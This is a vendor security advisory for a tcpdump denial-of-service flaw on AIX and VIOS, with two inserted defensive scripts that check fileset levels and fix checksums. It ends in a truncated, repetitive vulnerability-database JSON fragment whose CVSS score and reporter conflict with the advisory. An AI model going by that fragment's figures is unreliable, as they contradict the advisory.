PLATFORMS: AIX 6.1 and 7.1 releases
           VIOS 2.2.*
SOLUTION: Apply the fix as described below
THREAT: A remote attacker can cause denial of service
CVE Number: CVE-2014-8769 CVSS=5.00
Reboot required? NO
Workarounds? NO
Protected by FPM? NO
Protected by SED? NO
===============================================================================
DETAILED INFORMATION
I. DESCRIPTION (from cve.mitre.org)
CVE-2014-8769
tcpdump is vulnerable to a denial of service, caused by the improper
handling of input by the application decoder for the Ad hoc On-Demand
Distance Vector (AODV) protocol. By sending specially-crafted data, a
remote attacker could exploit this vulnerability to cause the application
to crash.
Please see the following for more information:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769
II. CVSS
CVE-2014-8769
CVSS Base Score: 5.00
CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/98764 for the
current score
CVSS Environmental Score*: Undefined
CVSS String: (AV:N/AC:L/Au:N/C:N/I:N/A:P)
III. PLATFORM VULNERABILITY ASSESSMENT
Note: To use the following commands on VIOS you must first
execute:
oem_setup_env
To determine if your system is vulnerable, execute the following
command:
lslpp -L bos.net.tcp.server
The following fileset levels are vulnerable:
AIX Fileset          Lower Level   Upper Level   KEY
----------------------------------------------------------
bos.net.tcp.server   6.1.8.0       6.1.8.18      key_w_fs
bos.net.tcp.server   6.1.9.0       6.1.9.30      key_w_fs
bos.net.tcp.server   7.1.2.0       7.1.2.18      key_w_fs
bos.net.tcp.server   7.1.3.0       7.1.3.30      key_w_fs

AIX Fileset (VIOS)   Lower Level          Upper Level
----------------------------------------------------------------
bos.net.tcp.server   6.1.8.0(2.2.2.0)     6.1.8.18(2.2.2.6)
bos.net.tcp.server   6.1.9.0(2.2.3.0)     6.1.9.30(2.2.3.4)
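
The range check above can be scripted. The following is an added example, not part of IBM's advisory: it compares the level reported by lslpp -L with the vulnerable ranges, and also looks for the interim fix in "emgr -l" output, because an interim fix leaves the fileset level unchanged. The function names, the sample tool output and the rule that the ifix label is the package file name up to its first dot are assumptions.

```shell
#!/bin/sh
# Added example (not IBM's code): decide whether a host needs the tcpdump fix.

# Vulnerable bos.net.tcp.server ranges, "lower upper", from the advisory table.
VULN_RANGES='6.1.8.0 6.1.8.18
6.1.9.0 6.1.9.30
7.1.2.0 7.1.2.18
7.1.3.0 7.1.3.30'

# Interim fix labels. Assumption: the label is the part of the epkg file
# name before the first dot (IV68950s5a.150205.epkg.Z -> IV68950s5a).
IFIX_LABELS='IV68950s5a IV68992s4a IV68951s5a IV67588s4a'

# ver_le A B: true when dotted level A <= B, compared numerically per field
# (a plain string compare would rank 6.1.9.4 above 6.1.9.30).
ver_le() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, "."); if (m > n) n = m
        for (i = 1; i <= n; i++) {
            if (x[i] + 0 < y[i] + 0) exit 0
            if (x[i] + 0 > y[i] + 0) exit 1
        }
        exit 0
    }' </dev/null
}

# is_vulnerable_level LEVEL: true when LEVEL lies inside any listed range.
is_vulnerable_level() {
    while read -r lo hi; do
        if ver_le "$lo" "$1" && ver_le "$1" "$hi"; then
            return 0
        fi
    done <<EOF
$VULN_RANGES
EOF
    return 1
}

# level_from_lslpp: read "lslpp -L" output on stdin, print the fileset level.
level_from_lslpp() {
    awk '$1 == "bos.net.tcp.server" { print $2; exit }'
}

# has_ifix: read "emgr -l" output on stdin, true when a listed label appears.
has_ifix() {
    awk -v labels="$IFIX_LABELS" 'BEGIN { n = split(labels, l, " ") }
        { for (i = 1; i <= n; i++) for (f = 1; f <= NF; f++) if ($f == l[i]) found = 1 }
        END { exit (found ? 0 : 1) }'
}

# assess LSLPP_TEXT EMGR_TEXT: print one verdict word.
assess() {
    level=$(printf '%s\n' "$1" | level_from_lslpp)
    if [ -z "$level" ]; then echo NOT_INSTALLED
    elif ! is_vulnerable_level "$level"; then echo NOT_AFFECTED
    elif printf '%s\n' "$2" | has_ifix; then echo IFIX_APPLIED
    else echo VULNERABLE
    fi
}

# Constructed sample output, used when the AIX tools are not present.
SAMPLE_LSLPP='  Fileset                      Level  State  Type  Description (Uninstaller)
  ----------------------------------------------------------------------------
  bos.net.tcp.server        6.1.9.30    C     F    TCP/IP Server'
SAMPLE_EMGR='ID  STATE LABEL      INSTALL TIME      UPDATED BY ABSTRACT
1    S    IV68992s4a 03/25/15 09:12:44            constructed sample entry'

if command -v lslpp >/dev/null 2>&1; then
    assess "$(lslpp -L bos.net.tcp.server 2>/dev/null)" "$(emgr -l 2>/dev/null)"
else
    assess "$SAMPLE_LSLPP" ''
fi
```

On VIOS, run it after oem_setup_env, as for the lslpp command itself.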
IV. SOLUTIONS
A. APARS
IBM has assigned the following APARs to this problem:
AIX Level   APAR number   Availability     KEY
-------------------------------------------------------------
6.1.8       IV68950       09/30/2015 SP7   key_w_apar
6.1.9       IV68992       05/29/2015 SP5   key_w_apar
7.1.2       IV68951       09/30/2015 SP7   key_w_apar
7.1.3       IV67588       05/29/2015 SP5   key_w_apar
Subscribe to the APARs here:
http://www.ibm.com/support/docview.wss?uid=isg1IV68950
http://www.ibm.com/support/docview.wss?uid=isg1IV68992
http://www.ibm.com/support/docview.wss?uid=isg1IV68951
http://www.ibm.com/support/docview.wss?uid=isg1IV67588
By subscribing, you will receive periodic email alerting you
to the status of the APAR, and a link to download the fix once
it becomes available.
B. FIXES
Fixes are available. The fixes can be downloaded via ftp or
http from:
ftp://aix.software.ibm.com/aix/efixes/security/tcpdump_fix.tar
https://aix.software.ibm.com/aix/efixes/security/tcpdump_fix.tar
The links above are to a tar file containing the signed
advisory, fix packages, and PGP signatures for each package.
The fixes below include prerequisite checking. This will
enforce the correct mapping between the fixes and AIX
Technology Levels.
AIX Level   Interim Fix (*.Z)          KEY
--------------------------------------------------
6.1.8.5     IV68950s5a.150205.epkg.Z   key_w_fix
6.1.8.6     IV68950s5a.150205.epkg.Z   key_w_fix
6.1.9.4     IV68992s4a.150204.epkg.Z   key_w_fix
7.1.2.5     IV68951s5a.150205.epkg.Z   key_w_fix
7.1.2.6     IV68951s5a.150205.epkg.Z   key_w_fix
7.1.3.4     IV67588s4a.150204.epkg.Z   key_w_fix

VIOS Level  Interim Fix (*.Z)
-------------------------------------
2.2.2.5     IV68950s5a.150205.epkg.Z
2.2.2.6     IV68950s5a.150205.epkg.Z
2.2.3.4     IV68992s4a.150204.epkg.Z
To extract the fixes from the tar file:
tar -xvf tcpdump_fix.tar
cd tcpdump_fix
Verify you have retrieved the fixes intact:
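The checksums below were generated using the
"openssl dgst -sha256 file" command as the following:

openssl dgst -sha256                                               filename                   KEY
----------------------------------------------------------------------------------------------------
f35915e5d216820cdb2c530d9fb667bf7439293a310b1d17ba420aa613f10cd5   IV68950s5a.150205.epkg.Z   key_w_csum
2f0e6e863647a6c4a786a881363b1dc62aa5c3612aab5d2761ab0c14a7d799be   IV68992s4a.150204.epkg.Z   key_w_csum
7baa89d4387dd0251b83b4598773d3fc5b8bb6080a50bc3ee3881e70b5052fed   IV68951s5a.150205.epkg.Z   key_w_csum
753e23a332f7e617007159bebb5e4d02c5bfdc0a2566714546b9c2ec4d512978   IV67588s4a.150204.epkg.Z   key_w_csum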
These sums should match exactly. The OpenSSL signatures in the tar
file and on this advisory can also be used to verify the
integrity of the fixes. If the sums or signatures cannot be
confirmed, contact IBM AIX Security at
security-alert@austin.ibm.com and describe the discrepancy.
openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>
openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>
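
The checksum comparison can be done mechanically rather than by eye. The following is an added example, not part of IBM's advisory: it checks every file named in a "<sha256> <file name>" manifest and fails if any file is missing or differs. The function names, the manifest layout and the sha256sum fallback are assumptions; the self-check uses a constructed file, not a real fix package.

```shell
#!/bin/sh
# Added example (not IBM's code): check downloaded ifix packages against a
# "<sha256> <file name>" manifest and report every problem found.

# sha256_of FILE: print the lowercase hex SHA-256 of FILE.
sha256_of() {
    if command -v openssl >/dev/null 2>&1; then
        # "openssl dgst -sha256 file" prints "...(file)= <hex>"; keep the hex.
        openssl dgst -sha256 "$1" | awk '{ print $NF }'
    else
        # Fallback for hosts without openssl (assumption, not in the advisory).
        sha256sum "$1" | awk '{ print $1 }'
    fi
}

# verify_manifest DIR: read manifest lines on stdin; return 0 only when every
# listed file exists in DIR and its digest matches.
verify_manifest() {
    dir=$1
    rc=0
    while read -r want name; do
        [ -n "$name" ] || continue
        if [ ! -f "$dir/$name" ]; then
            echo "MISSING  $name"
            rc=1
            continue
        fi
        got=$(sha256_of "$dir/$name")
        if [ "$got" = "$want" ]; then
            echo "OK       $name"
        else
            echo "MISMATCH $name"
            rc=1
        fi
    done
    return $rc
}

# demo: self-check on constructed data, a file holding "abc" and the
# well-known SHA-256 of that string.
demo() {
    tmp=${TMPDIR:-/tmp}/ifixcheck.$$
    mkdir "$tmp" || return 2
    printf abc > "$tmp/sample.epkg.Z"
    verify_manifest "$tmp" <<EOF
ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad sample.epkg.Z
EOF
    status=$?
    rm -rf "$tmp"
    return $status
}

demo || echo "self-check failed" >&2
```

For the real packages, save the hash and file name columns of the checksum table as a manifest file and run verify_manifest tcpdump_fix < manifest.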
C. FIX AND INTERIM FIX INSTALLATION
IMPORTANT: If possible, it is recommended that a mksysb backup
of the system be created. Verify it is both bootable and
readable before proceeding.
To preview a fix installation:

    installp -a -d fix_name -p all  # where fix_name is the name of the
                                    # fix package being previewed.

To install a fix package:

    installp -a -d fix_name -X all  # where fix_name is the name of the
                                    # fix package being installed.

Interim fixes have had limited functional and regression
testing but not the full regression testing that takes place
for Service Packs; however, IBM does fully support them.
Interim fix management documentation can be found at:
http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html
To preview an interim fix installation:

    emgr -e ipkg_name -p       # where ipkg_name is the name of the
                               # interim fix package being previewed.

To install an interim fix package:

    emgr -e ipkg_name -X       # where ipkg_name is the name of the
                               # interim fix package being installed.

V. WORKAROUNDS (from kb.isc.org)
None.
VI. OBTAINING FIXES
AIX security fixes can be downloaded from:
ftp://aix.software.ibm.com/aix/efixes/security
AIX fixes can be downloaded from:
http://www.ibm.com/eserver/support/fixes/fixcentral/main/pseries/aix
NOTE: Affected customers are urged to upgrade to the latest
applicable Technology Level and Service Pack.
VII. CONTACT INFORMATION
If you would like to receive AIX Security Advisories via email,
please visit "My Notifications":
http://www.ibm.com/support/mynotifications
and click on the "My notifications" link.
To view previously issued advisories, please visit:
http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq
Comments regarding the content of this announcement can be
directed to:
security-alert@austin.ibm.com
To obtain the OpenSSL public key that can be used to verify the
signed advisories and ifixes:
Download the key from our web page:
http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgpkey.txt
To obtain the PGP public key that can be used to communicate
securely with the AIX Security Team you can either:
A. Send an email with "get key" in the subject line to:
security-alert@austin.ibm.com
B. Download the key from a PGP Public Key Server. The key ID is:
0x28BFAA12
Please contact your local IBM AIX support center for any
assistance.
VIII. ACKNOWLEDGMENTS
N/A.
IX. REFERENCES:
Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html
On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2
X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/
CVE-2014-8769: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769
*The CVSS Environment Score is customer environment specific and will
ultimately impact the Overall CVSS Score. Customers can evaluate the
impact of this vulnerability in their environments by accessing the links
in the Reference section of this Flash.
Note: According to the Forum of Incident Response and Security Teams
(FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry
open standard designed to convey vulnerability severity and help to
determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES
"AS IS" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE
RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY
VULNERABILITY.
"7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.2.0", "versionLte": "7.1.2.18"}], "bulletinFamily": "unix", "cvelist": ["CVE-2014-8769"], "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Wed Mar 18 10:29:53 CDT 2015\n|Updated: Tue Mar 24 13:39:27 CDT 2015\n|Update: Corrected 6.1.9.4 iFix checksum\n\nThe most recent version of this document is available 
here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\nhttps://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\nftp://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\n===============================================================================\n VULNERABILITY SUMMARY\n\nVULNERABILITY: Vulnerability in AIX tcpdump\n\n PLATFORMS: AIX 6.1, and 7.1 releases\n VIOS 2.2.*\n\n SOLUTION: Apply the fix as described below\n\n THREAT: A remote attacker can cause denial of service\n\n CVE Number: CVE-2014-8769 CVSS=5.00\n\n Reboot required? NO\n Workarounds? NO\n Protected by FPM? NO\n Protected by SED? NO\n\n===============================================================================\n DETAILED INFORMATION\n\nI. DESCRIPTION (from cve.mitre.org)\n\n CVE-2014-8769\n tcpdump is vulnerable to a denial of service, caused by the improper\n handling of input by the application decoder for the Ad hoc On-Demand\n Distance Vector (AODV) protocol. By sending specially-crafted data, a\n remote attacker could exploit this vulnerability to cause the application\n to crash.\n\n Please see following for more information:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769\n\nII. CVSS\n\n CVE-2014-8769 \n CVSS Base Score: 5.00\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/98764 for the\n current score\n CVSS Environmental Score*: Undefined\n CVSS String: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\nIII. 
PLATFORM VULNERABILITY ASSESSMENT\n\n Note: To use the following commands on VIOS you must first\n execute:\n\n oem_setup_env\n\n To determine if your system is vulnerable, execute the following\n command:\n\n lslpp -L bos.net.tcp.server\n\n The following fileset levels are vulnerable:\n\n AIX Fileset Lower Level Upper Level KEY\n ----------------------------------------------------------\n bos.net.tcp.server 6.1.8.0 6.1.8.18 key_w_fs\n bos.net.tcp.server 6.1.9.0 6.1.9.30 key_w_fs\n bos.net.tcp.server 7.1.2.0 7.1.2.18 key_w_fs\n bos.net.tcp.server 7.1.3.0 7.1.3.30 key_w_fs\n\n\n AIX Fileset (VIOS) Lower Level Upper Level\n ----------------------------------------------------------------\n bos.net.tcp.server 6.1.8.0(2.2.2.0) 6.1.8.18(2.2.2.6)\n bos.net.tcp.server 6.1.9.0(2.2.3.0) 6.1.9.30(2.2.3.4)\n\nIV. SOLUTIONS\n\n A. APARS\n\n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR number Availability KEY\n -------------------------------------------------------------\n 6.1.8 IV68950 09/30/2015 SP7 key_w_apar\n 6.1.9 IV68992 05/29/2015 SP5 key_w_apar\n 7.1.2 IV68951 09/30/2015 SP7 key_w_apar\n 7.1.3 IV67588 05/29/2015 SP5 key_w_apar\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV68950\n http://www.ibm.com/support/docview.wss?uid=isg1IV68992\n http://www.ibm.com/support/docview.wss?uid=isg1IV68951\n http://www.ibm.com/support/docview.wss?uid=isg1IV67588\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available. The fixes can be downloaded via ftp or\n http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/tcpdump_fix.tar\n https://aix.software.ibm.com/aix/efixes/security/tcpdump_fix.tar\n\n The links above are to a tar file containing the signed\n advisory, fix packages, and PGP signatures for each package.\n The fixes below include prerequisite checking. 
This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n AIX Level Interim Fix (*.Z) KEY\n --------------------------------------------------\n 6.1.8.5 IV68950s5a.150205.epkg.Z key_w_fix \n 6.1.8.6 IV68950s5a.150205.epkg.Z key_w_fix\n 6.1.9.4 IV68992s4a.150204.epkg.Z key_w_fix\n 7.1.2.5 IV68951s5a.150205.epkg.Z key_w_fix\n 7.1.2.6 IV68951s5a.150205.epkg.Z key_w_fix\n 7.1.3.4 IV67588s4a.150204.epkg.Z key_w_fix\n\n VIOS Level Interim Fix (*.Z)\n -------------------------------------\n 2.2.2.5 IV68950s5a.150205.epkg.Z\n 2.2.2.6 IV68950s5a.150205.epkg.Z \n 2.2.3.4 IV68992s4a.150204.epkg.Z \n\n To extract the fixes from the tar file:\n tar -xvf tcpdump_fix.tar\n cd tcpdump_fix\n\n Verify you have retrieved the fixes intact:\n\n\t\tThe checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the following:\n\n openssl dgst -sha256 filename KEY\n ----------------------------------------------------------------------------------------------------\n f35915e5d216820cdb2c530d9fb667bf7439293a310b1d17ba420aa613f10cd5 IV68950s5a.150205.epkg.Z key_w_csum \n| 2f0e6e863647a6c4a786a881363b1dc62aa5c3612aab5d2761ab0c14a7d799be IV68992s4a.150204.epkg.Z key_w_csum\n 7baa89d4387dd0251b83b4598773d3fc5b8bb6080a50bc3ee3881e70b5052fed IV68951s5a.150205.epkg.Z key_w_csum\n 753e23a332f7e617007159bebb5e4d02c5bfdc0a2566714546b9c2ec4d512978 IV67588s4a.150204.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n C. 
FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\nV. WORKAROUNDS (from kb.isc.org)\n None.\n\nVI. OBTAINING FIXES\n\n AIX security fixes can be downloaded from:\n\n ftp://aix.software.ibm.com/aix/efixes/security\n\n AIX fixes can be downloaded from:\n\n http://www.ibm.com/eserver/support/fixes/fixcentral/main/pseries/aix\n\n NOTE: Affected customers are urged to upgrade to the latest\n applicable Technology Level and Service Pack.\n\nVII. 
CONTACT INFORMATION\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n and click on the \"My notifications\" link.\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n\n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgpkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team you can either:\n\n A. Send an email with \"get key\" in the subject line to:\n\n security-alert@austin.ibm.com\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\nVIII. ACKNOWLEDGMENTS\n N/A.\n\nIX. REFERENCES:\n\n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/\n CVE-2014-8769: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. 
Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n", "edition": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "e24a0caf3d333f838bc77ecfa043fe4639a6723a1b8d4b69fe6d8befc77bdc6e", "hashmap": [{"hash": "45574d737fa8e127d220db72c1f69aee", "key": "title"}, {"hash": "cdbce5fca5918eed20ded6147ba8526c", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b3202fb5837d6d5c3b25d37ae887006c", "key": "modified"}, {"hash": "2ca42b21a4f60f926451a7a96f35040f", "key": "aixFileset"}, {"hash": "9855627921475e40e00f92d60af14cb3", "key": "reporter"}, {"hash": "4d242e083b54b9dcd62e5929cd34c649", "key": "published"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "1f29179c46d95ecb82af8cffff89093d", "key": "cvelist"}, {"hash": "ea1bdd9185a2c3160cbbe9c0292c3d62", "key": "cvss"}, {"hash": "3502a2da909f90ed24ade4b158ee1cbf", "key": "description"}, {"hash": "7eeeede55cff5246d5628aad38e6a664", "key": "aix"}, {"hash": "93b5dede08410aa847f1b27d5e899dcc", "key": "href"}], "history": [], "href": "https://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc", "id": "TCPDUMP_ADVISORY.ASC", "lastseen": "2016-10-24T17:48:11", "modified": "2015-03-24T13:39:27", "objectVersion": "1.2", "published": "2015-03-18T10:29:53", "references": [], "reporter": "CentOS Project", "title": 
"Vulnerability in AIX tcpdump", "type": "aix", "viewCount": 11}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2016-10-24T17:48:11"}], "edition": 3, "hashmap": [{"key": "aix", "hash": "7eeeede55cff5246d5628aad38e6a664"}, {"key": "aixFileset", "hash": "2ca42b21a4f60f926451a7a96f35040f"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "1f29179c46d95ecb82af8cffff89093d"}, {"key": "cvss", "hash": "ea1bdd9185a2c3160cbbe9c0292c3d62"}, {"key": "description", "hash": "3502a2da909f90ed24ade4b158ee1cbf"}, {"key": "href", "hash": "93b5dede08410aa847f1b27d5e899dcc"}, {"key": "modified", "hash": "b3202fb5837d6d5c3b25d37ae887006c"}, {"key": "published", "hash": "4d242e083b54b9dcd62e5929cd34c649"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9855627921475e40e00f92d60af14cb3"}, {"key": "title", "hash": "45574d737fa8e127d220db72c1f69aee"}, {"key": "type", "hash": "cdbce5fca5918eed20ded6147ba8526c"}], "hash": "e24a0caf3d333f838bc77ecfa043fe4639a6723a1b8d4b69fe6d8befc77bdc6e", "viewCount": 25, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-8769"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31395", "SECURITYVULNS:DOC:31477", "SECURITYVULNS:VULN:14136", "SECURITYVULNS:VULN:14095", "SECURITYVULNS:VULN:14630", "SECURITYVULNS:DOC:32390"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:129157"]}, {"type": "nessus", "idList": ["AIX_IV68951.NASL", "AIX_IV67588.NASL", "AIX_IV68992.NASL", "AIX_IV68950.NASL", "FEDORA_2014-15549.NASL", "SUSE_11_TCPDUMP-141215.NASL", "MANDRIVA_MDVSA-2014-240.NASL", "FEDORA_2014-15609.NASL", "OPENSUSE-2015-146.NASL", "DEBIAN_DSA-3086.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310868548", "OPENVAS:1361412562310868783", "OPENVAS:703086", "OPENVAS:1361412562310868523", "OPENVAS:1361412562310703086", "OPENVAS:1361412562310868908", 
"OPENVAS:1361412562310121344", "OPENVAS:1361412562310869148"]}, {"type": "debian", "idList": ["DEBIAN:DLA-102-1:4756A", "DEBIAN:DSA-3086-1:0C00E"]}, {"type": "gentoo", "idList": ["GLSA-201502-05"]}, {"type": "ubuntu", "idList": ["USN-2433-1"]}, {"type": "archlinux", "idList": ["ASA-201503-20"]}], "modified": "2018-08-31T00:08:38"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "aixFileset": [{"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02"], "versionGte": "7.1.3.0", "versionLte": "7.1.3.30"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", 
"6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.8.0", "versionLte": "6.1.8.18"}, {"fileset": "bos.net.tcp.server", "productName": "aix", "productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01"], "versionGte": "6.1.9.0", "versionLte": 